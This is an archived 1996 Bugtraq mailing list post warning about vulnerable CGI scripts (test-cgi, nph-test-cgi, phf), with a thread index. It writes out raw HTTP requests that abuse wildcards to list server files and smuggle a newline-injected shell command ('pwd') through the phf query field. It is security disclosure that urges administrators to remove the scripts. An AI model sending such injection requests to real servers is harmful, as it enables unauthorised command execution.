Bugtraq mailing list archives
[nph]test-cgi
From: hobbit () avian org (*Hobbit*)
Date: Fri, 13 Dec 1996 00:36:00 CST
Interesting how many people are suddenly coming out of the woodwork as though test-cgi was a new problem. With minor variants, both scripts are a problem in a couple of areas. Crank each of these plus a couple of newlines into your server and see what you get: GET /cgi-bin/test-cgi?* HTTP/1.0 GET /cgi-bin/test-cgi?x * GET /cgi-bin/nph-test-cgi?* HTTP/1.0 GET /cgi-bin/nph-test-cgi?x * not to mention GET /cgi-bin/phf?Q=x%0apwd GET /cgi-bin/phf?Q=x%ffpwd then NUKE everything in that cgi-bin dir and replace what you need with well-written standalone PROGRAMS that start by mistrusting their environment. _H*
Current thread:
- [nph]test-cgi *Hobbit* (Dec 12)
- Re: [nph]test-cgi Laurent FACQ (Dec 16)
- Irix: scanners hole Yuri Volobuev (Dec 16)
- scanf overflow David Sacerdote (Dec 16)